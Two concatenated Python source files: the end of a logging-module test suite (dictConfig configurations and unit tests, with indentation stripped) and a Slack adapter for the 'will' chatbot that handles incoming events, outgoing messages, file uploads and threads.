"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
|
slack.py | """Slack adapter for willbot
"""
# pylint: disable=no-member
import json
import logging
import random
import sys
import time
import traceback
import urllib
from multiprocessing import Process
from threading import Thread
from typing import Dict, Optional
import slack_sdk
from markdownify import MarkdownConverter
from slack_sdk.rtm import RTMClient
from will import settings
from will.abstractions import Channel, Event, Message, Person
from will.mixins import SleepMixin, StorageMixin
from will.utils import UNSURE_REPLIES, clean_for_pickling
from .base import IOBackend
# https://api.slack.com/docs/rate-limits says the actual max is 16k, but that includes the entire POST content, and
# warns about multibyte characters. Turns out the API will disconnect you if there are more than 4031 characters
# in the message. Documentation is hard.
MAX_MESSAGE_SIZE = 4031
class SlackMarkdownConverter(MarkdownConverter):
"Extended Markdown converter"
def convert_strong(self, _, text): # pylint: disable=no-self-use
"Normal markup is incorrect for Slack"
return "*%s*" % text if text else ""
def convert_a(self, el, text):
"dress up <a> links for Slack"
href = el.get("href")
title = el.get("title")
if self.options["autolinks"] and text == href and not title:
# Shortcut syntax
return "<%s>" % href
title_part = ' "%s"' % title.replace('"', r"\"") if title else ""
return "<%s%s|%s>" % (href, title_part, text or "") if href else text or ""
class SlackBackend(
IOBackend, SleepMixin, StorageMixin
): # pylint: disable=too-many-instance-attributes
"Adapter that lets Will talk to Slack"
friendly_name = "Slack"
internal_name = "will.backends.io_adapters.slack"
required_settings = [
{
"name": "SLACK_API_TOKEN",
"obtain_at": "1. Go to https://api.slack.com/apps?new_classic_app=1"
" and Configure your app.\n"
'2. Install app in your workspace.\n'
"3. Set Bot User OAuth Token (beginning with xoxb) as SLACK_API_TOKEN.",
}
]
PAGE_LIMIT = 1000
_channels: Dict[str, Channel] = dict()
_people: Dict[str, Person] = dict()
_default_channel = None
rtm_thread: Optional[RTMClient] = None
complained_about_default = False
complained_uninvited = False
_client = None
me = None
handle = None
def get_channel_from_name(self, name):
"Decodes human-readable name into the Slack channel name"
for c in self.channels.values():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c
# We need to check if a user id was passed as a channel
# and get the correct IM channel if it was.
elif name.startswith('U') or name.startswith('W'):
return self.open_direct_message(name)
webclient = self.client._web_client # pylint: disable=protected-access
try:
channel_info = webclient.conversations_info(channel=name)["channel"]
except slack_sdk.errors.SlackApiError:
logging.warning('Error looking up Slack channel %s', name)
return None
channel_members = webclient.conversations_members(channel=name)
now = time.time()
members = {
x: self.people[x]
for x in channel_members.get("members", list())
if x in self.people
}
logging.debug("took %0.2f seconds to scan people data", time.time() - now)
return Channel(
name=channel_info.get("name", name),
id=channel_info["id"],
members=members,
source=name,
is_channel=False,
is_group=False,
is_im=channel_info["is_im"],
is_private=True,
)
def get_channel_name_from_id(self, name):
for k, c in self.channels.items():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c.name
def normalize_incoming_event(self, event):
"Makes a Slack event look like all the other events we handle"
event_type = event.get("type")
event_subtype = event.get("subtype")
logging.debug("event type: %s, subtype: %s", event_type, event_subtype)
if (
(
event_subtype is None
and event_type not in ["message_changed", "message.incoming"]
)
# Ignore thread summary events (for now.)
and (
event_subtype is None
or ("message" in event and "thread_ts" not in event["message"])
)
):
# print("slack: normalize_incoming_event - %s" % event)
# Sample of group message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495661121.838366', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'C5JDAR2S3'}
# Sample of 1-1 message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495662397.335424', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'D5HGP0YE7'}
# Threaded message
# {u'event_ts': u'1507601477.000073', u'ts': u'1507601477.000073',
# u'subtype': u'message_replied', u'message':
# {u'thread_ts': u'1507414046.000010', u'text': u'hello!',
# u'ts': u'1507414046.000010', u'unread_count': 2,
# u'reply_count': 2, u'user': u'U5GUL9D9N', u'replies':
# [{u'user': u'U5ACF70RH', u'ts': u'1507601449.000007'}, {
# u'user': u'U5ACF70RH', u'ts': u'1507601477.000063'}],
# u'type': u'message', u'bot_id': u'B5HL9ABFE'},
# u'type': u'message', u'hidden': True, u'channel': u'D5HGP0YE7'}
logging.debug("we like that event!")
if event_subtype == "bot_message":
sender = Person(
id=event["bot_id"],
mention_handle="<@%s>" % event["bot_id"],
handle=event["username"],
source=event,
name=event["username"],
)
else:
sender = self.people[event["user"]]
try:
channel = self.get_channel_from_name(event["channel"])
except KeyError:
self._update_channels()
channel = self.get_channel_from_name(event["channel"])
is_private_chat = getattr(channel, "is_private", False)
is_direct = getattr(getattr(channel, "source", None), 'is_im', False)
channel = clean_for_pickling(channel)
# print "channel: %s" % channel
interpolated_handle = "<@%s>" % self.me.id
real_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
thread = None
if "thread_ts" in event:
thread = event["thread_ts"]
if interpolated_handle in event["text"] or real_handle in event["text"]:
will_is_mentioned = True
if event["text"].startswith(interpolated_handle):
event["text"] = event["text"][len(interpolated_handle):]
if event["text"].startswith(real_handle):
event["text"] = event["text"][len(real_handle):]
# sometimes autocomplete adds a : to the usename, but it's certainly extraneous.
if will_is_mentioned and event["text"][0] == ":":
event["text"] = event["text"][1:]
if event.get("user") == self.me.id:
will_said_it = True
m = Message(
content=event["text"].strip(),
type=event_type,
is_direct=is_direct or will_is_mentioned,
is_private_chat=is_private_chat,
is_group_chat=not (is_private_chat or is_direct),
backend=self.internal_name,
sender=sender,
channel=channel,
thread=thread,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
return m
# An event type the slack ba has no idea how to handle.
return None
def set_topic(self, event):
"""Sets the channel topic. This doesn't actually work anymore since Slack has removed that ability from bots.
Leaving the code here in case they re-enable it."""
data = self.set_data_channel_and_thread(event)
self.client._web_client.api_call( # pylint: disable=protected-access
"conversations.setTopic",
topic=event.content,
channel=data["channel"],
)
def send_file(self, event):
'Sometimes you need to upload an image or file'
try:
logging.info('EVENT: %s', str(event))
data = {}
if hasattr(event, "kwargs"):
data.update(event.kwargs)
data.update({
'filename': event.filename,
'filetype': event.filetype
})
self.set_data_channel_and_thread(event, data)
# This is just *silly*
if 'thread_ts' in data:
del data['thread_ts']
data['channels'] = data['channel']
del data['channel']
logging.debug('calling files_uploads with: %s', data)
result = self.client._web_client.api_call( # pylint: disable=protected-access
'files.upload', files={'file': event.file}, params=data)
logging.debug('send_file result: %s', result)
except Exception:
logging.exception("Error in send_file handling %s", event)
    def handle_outgoing_event(self, event, retry=5):
        """Route an outgoing event to the right Slack action.

        @ event: outgoing Event ("say"/"reply", "topic_change",
          "file.upload", or "message.no_response").
        @ retry: remaining reconnect attempts before giving up.
        """
        try:
            if event.type in ["say", "reply"]:
                if "kwargs" in event and "html" in event.kwargs and event.kwargs["html"]:
                    event.content = SlackMarkdownConverter().convert(event.content)
                # NOTE(review): this replace() is a no-op (old == new); it was
                # presumably an HTML-entity unescape ("&amp;" -> "&") that got
                # mangled by an export — confirm against upstream.
                event.content = event.content.replace("&", "&")
                event.content = event.content.replace(r"\_", "_")
                kwargs = {}
                if "kwargs" in event:
                    kwargs.update(**event.kwargs)
                if kwargs.get('update', None) is not None:
                    # kwargs["update"] marks an editable/refreshable message.
                    self.update_message(event)
                elif (
                    hasattr(event, "source_message")
                    and event.source_message
                    and "channel" not in kwargs
                ):
                    # Reply into the channel the triggering message came from.
                    self.send_message(event)
                else:
                    # Came from webhook/etc
                    target_channel = kwargs.get("room", kwargs.get("channel", None))
                    if target_channel:
                        event.channel = self.get_channel_from_name(target_channel)
                        if event.channel:
                            self.send_message(event)
                        else:
                            logging.error(
                                "I was asked to post to the slack %s channel, but it doesn't exist.",
                                target_channel,
                            )
                            if self.default_channel:
                                # Fall back to the default channel, annotating
                                # the intended destination in the text.
                                event.channel = self.get_channel_from_name(
                                    self.default_channel
                                )
                                event.content = (
                                    event.content + " (for #%s)" % target_channel
                                )
                                self.send_message(event)
                    elif self.default_channel:
                        event.channel = self.get_channel_from_name(self.default_channel)
                        self.send_message(event)
                    else:
                        logging.critical(
                            "I was asked to post to a slack default channel, but I'm nowhere."
                            "Please invite me somewhere with '/invite @%s'",
                            self.me.handle,
                        )
            elif event.type in [
                "topic_change",
            ]:
                self.set_topic(event)
            elif event.type in [
                "file.upload",
            ]:
                self.send_file(event)
            elif (
                event.type == "message.no_response"
                and event.data.is_direct
                and event.data.will_said_it is False
            ):
                # Unanswered DM: reply with a canned "not sure" response.
                event.content = random.choice(UNSURE_REPLIES)
                self.send_message(event)
        except (urllib.error.URLError, Exception):  # websocket got closed, no idea
            # NOTE(review): this tuple is redundant — Exception already covers
            # URLError — so ANY failure takes the reconnect path below.
            if retry < 1:
                sys.exit()
            # Drop the cached client; the `self.client` property rebuilds it.
            del self._client
            time.sleep(5)  # pause 5 seconds just because
            self.client
            self.handle_outgoing_event(event, retry=retry-1)
    @staticmethod
    def set_data_channel_and_thread(event, data=None):
        """Fill `data` with the channel (and optional thread) Slack should target.

        Derives the channel id from whichever event shape was handed in
        (explicit channel, .say() source message, or .reply() original
        incoming event), and sets "thread_ts" where a thread applies.

        Returns the updated dict — except for direct-message file uploads,
        where it returns None (callers must tolerate that).
        """
        if event.type == "file.upload":
            # We already know what to do when it's a file DM
            if event.kwargs.get("is_direct") is True:
                return
        if data is None:
            data = dict()
        if "channel" in event:
            # We're coming off an explicit set.
            channel_id = event.channel.id
        else:
            if "source_message" in event:
                # Mentions that come back via self.say()
                if hasattr(event.source_message, "data"):
                    channel_id = event.source_message.data.channel.id
                    if hasattr(event.source_message.data, "thread"):
                        data.update({"thread_ts": event.source_message.data.thread})
                else:
                    # Mentions that come back via self.say() with a specific room (I think)
                    channel_id = event.source_message.channel.id
                    if hasattr(event.source_message, "thread"):
                        data.update({"thread_ts": event.source_message.thread})
            else:
                # Mentions that come back via self.reply()
                if hasattr(event.data, "original_incoming_event"):
                    if hasattr(event.data.original_incoming_event.channel, "id"):
                        channel_id = event.data.original_incoming_event.channel.id
                    else:
                        channel_id = event.data.original_incoming_event.channel
                else:
                    if hasattr(
                        event.data["original_incoming_event"].data.channel, "id"
                    ):
                        channel_id = event.data[
                            "original_incoming_event"
                        ].data.channel.id
                    else:
                        channel_id = event.data["original_incoming_event"].data.channel
        try:
            # If we're starting a thread
            if (
                "kwargs" in event
                and event.kwargs.get("start_thread", False)
                and ("thread_ts" not in data or not data["thread_ts"])
            ):
                if hasattr(event.source_message, "original_incoming_event"):
                    data.update(
                        {
                            "thread_ts": event.source_message.original_incoming_event["ts"]
                        }
                    )
                elif (
                    hasattr(event.source_message, "data")
                    and hasattr(
                        event.source_message.data, "original_incoming_event"
                    )
                    and "ts" in event.source_message.data.original_incoming_event
                ):
                    logging.error(
                        "Hm. I was told to start a new thread, but while using .say(), instead of .reply().\n"
                        "This doesn't really make sense, but I'm going to make the best of it by pretending you "
                        "used .say() and threading off of your message.\n"
                        "Please update your plugin to use .reply() when you have a second!"
                    )
                    data.update(
                        {
                            "thread_ts": event.source_message.data.original_incoming_event[
                                "ts"
                            ]
                        }
                    )
                else:
                    if hasattr(event.data.original_incoming_event, "thread_ts"):
                        data.update(
                            {"thread_ts": event.data.original_incoming_event.thread_ts}
                        )
                    elif "thread" in event.data.original_incoming_event.data:
                        data.update(
                            {
                                "thread_ts": event.data.original_incoming_event.data.thread
                            }
                        )
        except Exception:
            # Best-effort thread resolution: failures are swallowed and only
            # the tail of the traceback is logged.
            logging.info(traceback.format_exc().split(" ")[-1])
        data.update(
            {
                "channel": channel_id,
            }
        )
        return data
    def get_event_data(self, event):
        """Build the payload dict for a Slack chat call from an outgoing event.

        Handles color/attachment kwargs, channel/thread routing, and falls
        back to a file upload when the text exceeds MAX_MESSAGE_SIZE — in
        which case it returns None instead of a payload.
        """
        data = {}
